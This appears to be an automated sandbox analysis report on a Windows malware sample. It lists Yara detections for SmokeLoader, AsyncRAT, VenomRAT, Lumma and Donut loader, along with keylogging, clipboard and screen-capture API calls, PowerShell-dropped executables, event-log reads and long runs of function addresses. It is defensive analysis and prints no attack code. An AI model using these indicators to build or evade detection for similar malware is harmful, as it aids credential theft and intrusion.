Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62400 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62401 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_0307ED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

16_2_0307ED00

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_0307FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

16_2_0307FB2F

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Found suspicious ZIP file

Source: venom.zip.14.dr	Zip Entry: runvm.bat
Source: lumma.zip.14.dr	Zip Entry: run.bat

PE file has a writeable .text section

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 75D90000 page execute and read and write

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401513
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	0_2_00402FD3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_0040267C NtEnumerateKey,	0_2_0040267C
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,	0_2_004020C4
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004026DC NtClose,	0_2_004026DC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,	0_2_004020E3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation,	0_2_004020E7
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,	0_2_004020FC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00402285 NtQuerySystemInformation,	0_2_00402285
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,	0_2_004020B6
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,	0_2_004020B8
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,	0_2_00403149
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower,	0_2_00403303
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151E
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004025DD NtOpenKey,	0_2_004025DD
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641636900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,	7_2_00007FF641636900
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641655260 NtAllocateVirtualMemory,	7_2_00007FF641655260
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641653F30 NtQueryInformationProcess,	7_2_00007FF641653F30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641655100 NtWriteVirtualMemory,	7_2_00007FF641655100
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416559D0 NtProtectVirtualMemory,	7_2_00007FF6416559D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641654FC0 NtReadVirtualMemory,	7_2_00007FF641654FC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D7370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	19_2_6C8D7370
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D7490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	19_2_6C8D7490
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_028E2A98 NtProtectVirtualMemory,	19_2_028E2A98
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_028E2640 NtProtectVirtualMemory,	19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C867490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	20_2_6C867490
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C867370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	20_2_6C867370
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_0251167A NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	20_2_0251167A

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64160E810	7_2_00007FF64160E810
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415F64A0	7_2_00007FF6415F64A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64163B6B0	7_2_00007FF64163B6B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64160BAB0	7_2_00007FF64160BAB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641678AB0	7_2_00007FF641678AB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64161B6A0	7_2_00007FF64161B6A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641643E80	7_2_00007FF641643E80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641642080	7_2_00007FF641642080
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641621880	7_2_00007FF641621880
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641645860	7_2_00007FF641645860
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415F1450	7_2_00007FF6415F1450
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641600050	7_2_00007FF641600050
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64164CC40	7_2_00007FF64164CC40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641601920	7_2_00007FF641601920
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641673F20	7_2_00007FF641673F20
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641631510	7_2_00007FF641631510
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641605910	7_2_00007FF641605910
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641651700	7_2_00007FF641651700
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415FA0F0	7_2_00007FF6415FA0F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416304D0	7_2_00007FF6416304D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641613AD0	7_2_00007FF641613AD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415F5AD4	7_2_00007FF6415F5AD4
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641605ED0	7_2_00007FF641605ED0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416716C0	7_2_00007FF6416716C0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416343B0	7_2_00007FF6416343B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64160D7A0	7_2_00007FF64160D7A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64165898B	7_2_00007FF64165898B
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64161D390	7_2_00007FF64161D390
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641655B80	7_2_00007FF641655B80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641676B70	7_2_00007FF641676B70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641654370	7_2_00007FF641654370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64164F370	7_2_00007FF64164F370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415FFB70	7_2_00007FF6415FFB70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641647D60	7_2_00007FF641647D60
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641633150	7_2_00007FF641633150
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641639550	7_2_00007FF641639550
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641620740	7_2_00007FF641620740
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641665D40	7_2_00007FF641665D40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641629830	7_2_00007FF641629830
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64166C230	7_2_00007FF64166C230
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64164E430	7_2_00007FF64164E430
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641603E30	7_2_00007FF641603E30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64164B020	7_2_00007FF64164B020
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415FC400	7_2_00007FF6415FC400
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641607000	7_2_00007FF641607000
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6415FBC00	7_2_00007FF6415FBC00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64161FC10	7_2_00007FF64161FC10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641648C10	7_2_00007FF641648C10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641652010	7_2_00007FF641652010
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641664E10	7_2_00007FF641664E10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641614E00	7_2_00007FF641614E00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641646DF0	7_2_00007FF641646DF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416411F0	7_2_00007FF6416411F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64160CFF0	7_2_00007FF64160CFF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416749F0	7_2_00007FF6416749F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641604BF0	7_2_00007FF641604BF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF641636DE0	7_2_00007FF641636DE0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416229E0	7_2_00007FF6416229E0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64161A9D0	7_2_00007FF64161A9D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF64166DFD0	7_2_00007FF64166DFD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Code function: 7_2_00007FF6416357C0	7_2_00007FF6416357C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC3430	10_2_00007FFD9BAC3430
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC4196	10_2_00007FFD9BAC4196
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC51C8	10_2_00007FFD9BAC51C8
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC970C	10_2_00007FFD9BAC970C
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC4752	10_2_00007FFD9BAC4752
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAD14D0	10_2_00007FFD9BAD14D0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAD0928	10_2_00007FFD9BAD0928
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAD0F0D	10_2_00007FFD9BAD0F0D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB4182	12_2_00007FFD9BAB4182
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB3BC6	12_2_00007FFD9BAB3BC6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB51C0	12_2_00007FFD9BAB51C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB2EDF	12_2_00007FFD9BAB2EDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB36CC	12_2_00007FFD9BAB36CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB63FB	14_2_00007FFD9BAB63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB3AFB	14_2_00007FFD9BAB3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAC10FA	14_2_00007FFD9BAC10FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB6040	14_2_00007FFD9BAB6040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB0E35	14_2_00007FFD9BAB0E35
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03061B25	16_2_03061B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03071B52	16_2_03071B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03072290	16_2_03072290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030672DD	16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030552E0	16_2_030552E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03067189	16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03076F80	16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308CD40	16_2_0308CD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0306EC40	16_2_0306EC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03083CD0	16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0305FB10	16_2_0305FB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308D340	16_2_0308D340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308B350	16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03056B70	16_2_03056B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030733B6	16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03074BF0	16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03076210	16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03057270	16_2_03057270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0305C270	16_2_0305C270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030682CB	16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03054900	16_2_03054900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03058960	16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308B160	16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030741A0	16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_030729C9	16_2_030729C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308A9E4	16_2_0308A9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308D010	16_2_0308D010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308B840	16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0306E086	16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03088880	16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03076890	16_2_03076890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308B700	16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03051F10	16_2_03051F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03073F97	16_2_03073F97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03064E68	16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03063678	16_2_03063678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03083680	16_2_03083680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03065E97	16_2_03065E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0308B5A0	16_2_0308B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03053DD0	16_2_03053DD0
